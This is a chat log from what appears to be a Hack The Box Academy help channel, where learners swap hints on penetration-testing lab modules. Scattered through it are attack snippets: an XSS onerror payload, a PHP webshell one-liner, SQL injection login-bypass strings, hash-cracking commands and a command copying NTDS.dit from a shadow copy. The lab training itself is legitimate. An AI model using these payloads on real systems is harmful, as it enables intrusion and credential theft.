Use the tasklist command to print the started services and then sort them in reverse order by name. The name of the service that begins with "vm" is the flag for this user. i don´t undestand

thanks, I have to to figure out what I missed:))

That was not the solution

I have heard that there is app that can
Automate few stuffs depending on x.y color changes etc

so what you do don't undestand? the sort them in reverse order by name part?

@vital adder That is the question

But I list the services with tasklist and I find the .exe with the initials "vm" but the flag does not appear.

which module and section are you on?

I think something else is missing because I have tried to do several things but I don't see an answer.
@vital adder

INTRODUCTION TO WINDOWS COMMAND LINE

-->skills asseessment

@vital adder user9 question

so you was doing it on the DC right?

yes

flag is the .exe file name

no

@forest tapir @rough thunder Can I DM you about this one?

sure.

Hi, I need some help with AD Enum & Attacks.

There's only 3 possible options, so worst-case, you can bruteforce it lol

All 3 failed?

I can't SSH from MS01 to Linux Host (permission denied) .

Hi everyone! how you doing? Any hint on the "Guessable Answer" from Broken Authentication module,
question: Reset the htbadmin user's password by guessing one of the questions. What is the flag?

XXS module

Q: Try to find a working XSS payload for the Image URL form found at '/phishing' in the above server, and then use what you learned in this section to prepare a malicious URL that injects a malicious login form. Then visit '/phishing/send.php' to send the URL to the victim, and they will log into the malicious login form. If you did everything correctly, you should receive the victim's login credentials, which you can use to login to '/phishing/login.php' and obtain the flag.

I am just starting thequestion, and I haven't been able to even get going with any code execution. When I try to inject into the url, there are already sinqle quotes which appear in the html. so I have been playing around with the encoding of the url, and there is one bloody single quote at the end of the injection that is there by default. If you know how to get rid of the single quote, or have any nudges in other directions, plz halp.

Encoded injection:
%2Fimages%2Fcat.jpg' onload%3D"alert('THM')%3B"

html result with single quote at the end of injection

I tried to get a little more creative and came up with this, but still not working. Perhaps I have overlooked something

Hello everybody! Someone could help me on AD skill assessment ? Im on the first host MS** with ps remoting but I can just use whoami or hostname, I cant move with cd.. how I can put Nc.exe on this second host?

im going crazy on the password attacks module section mutations the its so slow and its impossible to go through 90k wordlist

Copy the wordlist, and remove the first 17k lines.

keep trying until you get question with very simple answers and then focus only on trying answer to this question

Just got it! thanks! Leigb!

thanks man saved me a lot of time

Someone to help me? ^^

I think you need onerror there instead of onload. It tries to load the image listed at src and then if it can't it triggers the onerror. Something like ||' onerror=alert("oops")>||.

Bud are you here?:) I want ask again about Broken authentication skill assessment.

So, now I have ||support.uk:support|||| md5+b64|| cookie. I made a wordlist with ||support.uk(md5)||:roles from ||/CommonAdminBase64.tx|||| md5 encrypted|| ; set up my intruder for ||base64 encode and url main chars||
BUT no one role doesn't fit, what's the problem?

Guys mb you know what to do with that skill assessment?
The only thing I have to do is enumerate role but no one role doesn't fit.
This module drives me to despair...

Hey I just signed up and i was clicking on linux fundamentals modile

But I can’t unlock it for some reason

you dont really need a wordlist. Just think of what role you are trying to achieve

Like when i click unlock nothing happens and the page is zoomed out a little bit

you got 1 single character wrong 🤣

try contacting support

From where

hint the ||color question|| also i don't know if burp will work for this or not but i'm pretty sure it's won't

chat bubble

A gf q a

Thanks MrTom! I had this one!

Im using brave browser, cant really click any buttons

Let me disabled

The thing

Adblocker

Wait

It worke now

shiet...😡
I hate this module

same

but i would say the password attack is worse

but thank you. 1 character i think it is capital S in support...

wait no i mean the code 🤣

I got it so fast I remember... But yeah

fast??

yeah i think you are the first

in some the section if you are doing this when the module first come out and no one where the cred will be in the wordlist it's going to take a good bit to crack

and if you are doing something wrong you will just don't know

yeah true. I spent on Broken authentication more than a week... which is insane...

which assessment? and how tf did you get a powershell remote shell ?

Password attacks was brutal.

It was not that hard but sure tested my patience

im stuck on lsass because i cant get pypykatz running

AD skills part I, I have done on MS** a reverse shell on the first windows but when I have connection, I can’t do nothing

if you are on the pwnbox i got no idea how to get that tool to work

wait

ATTACKING WEB APPLICATIONS WITH FFUF, Sub-domain Fuzzing
should I see the subdomain in here, with the command I used?

I think that broken authentication module needs in some improvements...

if you are having issue with the tool on the pwnbox check this
#modules message

your command look about right

a rev shell as which user?

On MS** (sql_***) to web-win01

you can just F ing rdp in 🤣

I can rdp on web-win?

i didn't so no idea

Hii

Hum So i need to use web-win to pivot and after I should rdp with kali

You command is correct.. what are you looking for?

i try to answer this one: HackTheBox has an online Swag Shop. Try running a sub-domain fuzzing test on 'hackthebox.eu' to find it. What is the full domain of it?

oh i remember now

i know the answer

but find it yourself

should i see it?

wait let me run a quick scan on hackthebox domain

i remember the answer and its pretty easy one

but let me check if if get it in the scan results or not

Omg it works thank you

hey @robust mulch can you send me a DM when you have a moment?

can i dm you?

ya sure

no idea why but i run that exact command on the pwnbox and it found the right subdomain 🤣

Yes that does it! ty sir

Try HTTPS instead of HTTP.

I have tried so many variants and admin and support etc... all of these variants.
Now I have no Idea what to do:)

solved it. thank you 🙂 i found the answer yesterday...but must had a space at the end it was counted as wrong...

bro 🙂 since i knew the answer I straight up searched for it in browser and got redirected to a different site hackthebox.**** so I thought I won't show up in FFUF but it did..

well thanks for helping

can someone help me connect via rdp to server for the wireshark module?

the instruction tell me We will be sniffing traffic from the host we logged into from our own VM or Pwnbox. Utilizing interface ENS224 in Wireshark

i dont have that interface. i thought the VPN was one of the tunnels (tun1 or tun0)

xfreerdp /v:TARGETIP /u:USERNAME /p:PASSWORD

ok so i am using remmina i don thave xfreerdp installed

i am connect already to that machine but i still dont see this EN224 interface in wireshark when i run it on my local box

the remina interface has displayed a desktop that is "weird"

the first time i tried to connect it asked me for Mr beans password to allow 'color'

You need to run Wireshark on the host you connected to.

so i reset the link and now i get a all black screen with no controlls that i can see

right click does not bring up a menu to get a terminal

Log in with RDP (Remmina) on the specified host.
Then start Wireshark there.

ok so i figured out how to start wireshark by clicking on 'activities' but the resolution is only 644x480 so i cant use wireshark

how do i fix the resolution on the rdp hosted computer

maybe this will help you

https://askubuntu.com/questions/914775/remmina-scale-resolution-when-connect-from-ubuntu-to-windows-10

none of those suggestions fixed the problem. i am using a parrot os (HTB edition). i am unable to install xfreerdp2-x11 due to package version backward comparability issues (according to apt-get with the freerdp-client package) and remmina is not allowing me to dynamically change the resolution or manual set it before i connect. any other ideas?

I'm stuck at the Broken Authentication Assessment (https://academy.hackthebox.com/module/80/section/848). I registered an account and looked at the session cookie. I put it in cyberchef and out comes a MD5 hash which returns the username of the current logged in user. Then I just have to find the right user right? I did this by brute forcing the username in the message sending site ("User not found" ...), out comes the user "guest" is available. But when I make the MD5 hash of guest and put it to base64 it just won't accept the cookie and won't work. Then I tried to brute force the password using rockyou.txt and filtered the right passwords out, but no success. Please help me

With this you should be able to install xfreerdp on Parrot OS

sudo apt-get install aptitude
sudo aptitude install freerdp2-x11

https://www.reddit.com/r/debian/comments/vcpcpe/cant_install_freerdp_neither_freerdp2x11/

Take a good look at the site. It contains a hint how the user you are looking for must look like.

ohhhhhhhhhh

and i have to brute force the password for the user "support" right?

No, look at the hint again carefully.
Send me a DM if you need help. I do not want to spoil here.

hey guys! I'm beginner here in the field of cybersecurity. It's my dream to become an ethical hacker and join the cybersecurity and i've join this server to learn all the stuffs about cybersecurity and ethical hacking from the basic. Right now, I'm searching for someone who is experienced ethical hacker and can teach me or guide me towards ethical hacking from the first step. Is anybody there to help me?

nope but if you are new give both of these video a check https://www.youtube.com/watch?v=0vu_Hs4N8B8
https://www.youtube.com/watch?v=4JZjj_H4ei4

I need help with the IPMI section of the foorinting module. I have to get a password in cleartext. I got the has but I can't seem to brute force the password with hashcat, crackstation, or metasploits default list. not too sure where I'm going wrong

|| msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > set OUTPUT_JOHN_FILE john.txt ||

Then you should be able to crack the hash with John.

still having trouble with this wire shark lesson i am in the proper computer and on wire shark now.. but i only ever see a file called flag.jpeg which is not the correct file the hint suggest i should see other incorrect files like water.jpg htb.jpg that i never see. the picture i get back is that of a dog and seems to have nothing to do with transformers (for which i assume is a reference to the child's cartoon and not a electric grid component ) either. am i just failing to understand the program?

Yeah I def recommend John for this one, as the hashcat output isn't usable by hashcat

Ty!

it works for me the cookie you wrote but there's no admin panel in the ||"support.uk"|| account

no admin panel for the ||support|| account either

hint because that user isn't an admin user

thank you then I go back to username fuzzing

hello guys, I am doing File Upload Attacks: Whitelist Filters, and there is two techniques to use, I have used both of the techniques, and generated the successful payloads through Burp:Intruder, and after sending and testing all the payloads through Burg:Repeater, I get "File successfully uploaded", but after opening/examining any shell through browser or curl, I get 404 not found error.

but I noticed in all the the payloads there is "/" or "" as a special character, so I URL encoded them, and try to open them, but still 404 error appears, any help will be appreciated

the other special character is back slash

I am having the same issue, I haven't found any reference to "A certain Transformer Leader" and just found a flag.jpeg file with a dog.

i tried to let it run longer and filter way less

still only get the dog but i was able to use the traffic to answer the other question about the user name so i know i am not doing everything wrong.

same, I got the username as well - it seems broken to me

some things can be apparently good uploads but converts into bad filenames that either the file system or the web server cant path to properly.

so you get a good upload result, but youll never reach those files. Just gotta skip em as false positives

it is not the first time i tried to reset it. i think i might revisit it in a few days when i have time to get back to this ... hope you get it working or they fix it (or both).

I am going to move on as well. I will DM you if it works for me.

I mean I only got 6 or 7 positives out of like 200, but what do you suggest to do, what different things could be done ?

modules are rarely rarely actually broken. But I dont think Ive done the one yall talking bout so idk.

awesome best of luck i will do the same if i get it working next week

probably need to expand the range of extensions youre trying

i assume i am fitlering it out somehow

but because i can get the user name and see the dog... i am nto so sure.

okay, I will try

i do not think i am filtering anything out at this point in time and still only see the flag.jpeg file that contains the dog.

how do i make firefox not change a \ to a / in the url

does %5C work?

i think that is that code liek %20 for space but for the backslash

gotcha, ill figure it out, thank yiu

is anyone else getting traceback errors when running pypykatz.py? redownloading it and ran the install but no matter which module im trying to run it gives this error

Traceback (most recent call last):
File "/home/h0gbyte/Tools/pypykatz/pypykatz/pypykatz.py", line 12, in <module>
from pypykatz.commons.common import KatzSystemInfo
File "/home/h0gbyte/Tools/pypykatz/pypykatz/pypykatz.py", line 12, in <module>
from pypykatz.commons.common import KatzSystemInfo
ModuleNotFoundError: No module named 'pypykatz.commons'; 'pypykatz' is not a package

or better question. would anyone know if it would hurt the file if i removed this line

nvm commenting the line out doesnt change anything

has anyone found a way around this. i reinstalled again from github and its showing different lines as the problem

How to get the 'academy user' role?

verifying with the noahbot using your academy discord token

I don't see any?

itll be under settings under your account in the academy

I am in my account.. but I don't see such token 😅 I have seen in on my HTB account tho

are you paying for the academy?

I am

weird. for me it shows up above OPT devices

OTP*

aww wait, I have stopped the payment

ahhh. there you go

I have completed the CBBH path, that's why

Thanks for the help anyway ; )

np. would you happen to know anything regarding my issue by chance?

Nope😅 But I do know haha ; )

alrighty np. it is weird. i cant tell if its an issue with the tool or with my machines libraries

ill just come back to that section

hmm it seems the package is not installed

Which section are you doing?

it seems that way but ive run the install. and ive run it directly from the git folder after download. same error. just different lines

That's weird.. which tool do you try to use

the lsa minidump

CPTS path, I think

I only did CBBH mate 😁

yes it is

its all good. i put out a community help thing maybe someone has run into the issue

Wait, I can try it for you on my Ubuntu vm

dm the the link of the tool ; )

https://github.com/skelsec/pypykatz

I receive another error atm

what error are you getting?

yup i was getting that one too

Hmm sorry man, I can't solve this one in a few mins

idk how HTB tells you to install/use it

its all good. ive been trying to figure it out for a while

oh i had this earlier today

same pypykatz problem

hold on i search for the message

it doesnt say anything about installing. just talks about the tool. and the use is for an lsass dump file. so it would run as pypykatz lsa minidump <lsadumpfile> to run it

Make a new instance
pip3 install --upgrade pyopenssl==22.1.0
pip3 install pypykatz
pip3 install --upgrade minikerberos==0.3.5

if you use pwnbox

im using kali. but that still may work

it worked for me

holy shit. i think that worked

but i have to say the password attack module is kinda pain

i know i had the same reaction

it did. dude thank you so much. yea it seems minikerberos i had was 0.4.0 and pyopenssl just wasnt there

Mood

But yeah also some tools require an older version of python

Python2.7

i see. damn shouldn't have upgraded kali then. although there was a certain tool in an earlier module that required postgresql 15 and i had 14. pretty much screwed myself getting those changed out. so thats why i upgraded

well then i will actually put that in the community help for anyone else having the same issue. thanks guys

I think you can install specific versions

footprinting, medium lab, i found ||alex's|| credencials, i used ||remmina|| to login to the windows machine, i found ||important.txt|| im trying to use it as the ||Administrator password|| but it doesnt work, it says "the username or password is incorrect" may i please have some help?

You are on the right track. Try this Creds for login with rdp

how didnt i think of this??? thank you so much

How do I connect to the vm to capture data with wireshark in page 5 of AD enumeration and attacks the host it gives me to rdp into is a Linux box that can’t capture with wireshark

Working on the last question on the hashcat module in academy. The HTLM question. It always comes back as exhausted. I tried it with some of hashcat's built in rules but got the same result. what am I missing?
the command that I am running is clear

sudo hashcat -a0 -m27100 DC01.inlanefreight.local.ntds rockyou.txt

The guest account won't help you. Read all the pages and see if you can't figure out a likely account.

hint wrong mode

the hashs isn't NetNTLMv2

I also tried it with -m1000

same result

with rockyou?

yes

i really cannot find another username i tried admin, root, administrator, alex, public, important, windows none of them work

DM

i just give it a try and after 20 sec of running hashcat with rockyou it's cracked like almost 500 password

I need some help with the Broken Authentication skills assessment.. I have the support usernames (6 total), decoded the cookie (not the persistence one, no idea about that). Can't seem to get any passwords from rockyou.txt to work.. My grep filters down to 14 possibilities and they all fail.

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

also #rules and #welcome this channel is for discussing modules, not a generic help channel

Hello everyone, doing the attacking enterprise networks - lateral movement, and I did escalate with the ilfserveradm user to Administrator but still cannot get the flag from the admin desktop? Anyone available to get me some help with it or tell me if I am doing something wrong/missing something? Thank you

can someone give me a nudge on https://academy.hackthebox.com/module/143/section/1274 question 2 ?

what is the module and section; what exactly is giving you an issue, can you give an example of what you have tried (avoiding spoilers ofc); not everyone feels like just clicking the link to see what it's about

I love looking up the forum posts from the hackthebox academy stuff and finding @acoustic owl just in there somewhere in the thread xD

can i dm you not to spam here ?

just ask your question here unless you really can't ask the question without it being a spoiler?

yes, you can find me everywhere 🤣🤣

Ah it's this module; I haven't gotten that far yet in this module been back and forth a bit lately

oh ok :D, support is already helping, ty! 😄

i remember being addicted to HTB before the academy and seeing you everywhere xD

or am I mistaking you from somebody else xD ?

the command that I tried most recently was "sudo hashcat -a0 -m1000 <file from .zip> <rockyou.txt> and got nothing

hmm

i don't think m1000 is the right mode to unhash that file extension

even still there's an x2john that can be used

1000 is ntlm

https://hashcat.net/wiki/doku.php?id=example_hashes @visual quail

For anyone stuck with a similar issue in Attacking Common Services - SQL Databases. My issue was resolved by || extracting the mssqlsvc user hash again, the hash I originally got wouldn't crack so I got it again and it was different and cracked instantly ||

Found my own mistake when testing the passwords. Always understand the functions you use..

I got it! turned out that my command was correct. I would start it and then walk away from the computer and come back and it would say exhausted and I would go back to the drawing board. If I would have scrolled up I would have seen all the passwords that it cracked. the rest of the question was easy after that. Thanks for the help though!

Ah yeah it was unhashing the entire thing it sounds like

Instead of just the one you needed

yep

Hey did you find a way to fix it ?

I found the ones with actual hashes then made a list off that instead :)

That would have been a more efficient way to do it for sure.

yup

Is somebody available to help me get he double pivot working to MGMT01 on Attacking Enterprise Networks module (post-exploitation section)? The handler on my host doesn't catch the DC01 payload even if everything is set up just fine... thank you!!

Hello, I am on the NFS chapter in teh footprinting module. The first step is to cat /etc/exports/ The problem is that my computer does not have that file. Any thoughts on something I missed?

figured it out. needed to install nfs kernel.

@iron basin Did you get a nudge on your Login Brute-Force question? I'm stuck on the last two questions. I understand it as, since you now have an employee (cant say I do), stalk them, cupp a wordlist, brute ssh, get flag, then lateral locally to another employee and their flag. Thoughts?

@iron basin Tried -C combined, tried -P for pw list with -l for various users gained in module. Banner grab revealed a listening service so I exhausted those attempts. Tried -L and -P with many wordlists each but keep running out of time. I feel like I missed an "employee" name somewhere.

On attacking common services easy could i have some help getting my shell to work?

i am able to write files in mysql. I also see info about the xampp/xxxxx directory.

this section is making me bang my head

mood

yeah the webshell was a bitch

i don't recall exactly how I got it to work

I just remembered googling a bit then making it work with the ?c= <command>

What exactly is not working?
If you know the webroot directory and can write files there, then you can write a webshell in this directory

I can't access the webshell on the site

and I can't get a meterpreter session

I am following this blog https://outrunsec.com/tag/web-shell/

remember xampp is Windows

i know

made sure not to write the linux shell

because that is a whole other mood xD

but are you uploading a webshell or rev shell?

because you said meterpreter

you're unable to navigate to http://website/<file>?

I have written a PHP webshell in a file

let me show some screenshots of my process. I am not good at explaining

we know :^)

|| I realize i didn't specify port 8000 in screenshot, but even if i do meterpreter session wont happen ||

yes lol

Try it with
|| "<?php echo shell_exec($_GET['cmd']);?>" ||

sweet!

how did you have the intuition to know this

If you are not sure if you are in the right place and your PHP is running, you can also write a PHP Info File

<?php phpinfo();?>

I am not quite sure.
But normally I test with php info if PHP is working. The rest I do with Google

The tools they recommend for pivoting aren't great, in my opinion. This one made my life a lot easier:

https://github.com/p3nt4/Invoke-SocksProxy

Can I get any hints for this question?

I am new and i am wondering were to start?

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

anyone can help with Attacking SQL Databases .., please DM me

hey

username = a' OR '1'='1
password = a' OR '1'='1

Modules_make_pwsh_run!

Hi guys I am stuck on this question does not find the user to verify the login error. the question is as follows.
Which user account on the domain controller has many event identifier login errors (4625) generated in rapid succession, which is indicative of a password brute force attack? Flag is the name of the user account.

i don´t understand

Hi guys, noob here - want to get into pentesting, found this channel. My name is Nick, happy to be here, nice to meet you all!

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

@rustic sage ^

Thx ++

Password attacks

Medium Lab

logged in as user j**** what to do now

Greetings !

I have an issue on question 1 WINDOWS PRIVILEGE ESCALATION : Further Credential Theft

find the sql01 passwd

I've used all tools available but can"t find any trace of it. Can someone give me a hint ? 🙂

look for the services that are active

And what then? Pass reusage, mutations, looking for creds in some files?

You can use J**'s credentials to enter that service

and then look for information

God damnit, just had to read the question carefully ... Just login as Jordan ...

Hi all I am stuck and confused in the getting started (Web enumeration question "Try running some of the web enumeration techniques you learned in this section on the server above, and use the info you get to get the flag. ")
I scanned with nmap and get the login page, and scanned with gobuster and I got the wordpress is in setup mode.
The hint says "Everything you need to login is given to you"
I tried admin admin and admin password in the login page no success.
If I hit continue in the setup page nothing happen.
What am I missing?! I really need to understand here if I should be able to solve this exercise just using what has been explained in the Web enumeration page, or there is more to do.
I am not looking for a solution but I really need to understand how I need to approach to this course.
Thank you so much for any help

Sorry I solved it and it was super easy, this is confirming me that the assessment in the session is related to what has been explained to the session itself, good to know, now I can keep going more relaxed

nope, it is useful when and how to use them

footprinting, hard lab, i found the ||imap|| creds and logged on, i have no clue how to find the ||ssh key|| i selected the ||important|| folder and i need help with the commands, how do i view all messages? ||1 search all doesnt return anything an any folder except inbox, but its not the ssh key||

Attacking Enterprise Networks
i found the creds but "monitoring.inlanefreight.local" redirects back to "login.php" after authentication
doesn't go to the next page

Any tips for brute forcing Johanna's password? In the password attacks lab hard (I am using crackmapexe with winrm option)

anyone available for help on the last hop of the pivoting skill assessment (via dm)?

ActivwDirectory assesment
I used the webshell to get an RCE but I can't find credentials to access the machine .. I tried to look for connection string or credentials on the web.config file and found nothing .. also when I try to run powerUp script I get no response. can anyone tell me what should I do or give me a hint?

have you tried using the msfconsole module? I believe that's what I did.

I hadn't planned on using msfconsole, lately I was using Hydra and then I read that it was more advisable to use crackmapexe with the winrm option. I'm going to try it thx

https://donsutherland.org/crib/imap / This is what I used, definitely worth saving/bookmarking

You don't have to it was just a suggestion. That entire module you're supposed to use the given wordlists so try those! Also don't forget about password manipulation.

So I'm working on the web proxies module in the repeater section. I got the flag, but it's saying its wrong. What I did was send the request to repeater, then ls. flag.txt popped up so i cat flag.txt & got a flag. The hint is saying its not in the same directory, but I didn't have to traverse any directories. What am I doing wrong?

Yep, im just using the list with passwords mutated

wait I now see it says OTHER flag

Password Attacks/Attacking AD: I am trying to copy this NTDS.dit file, but it keeps saying that it cannot find the filepath....am I doing something wrong here cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit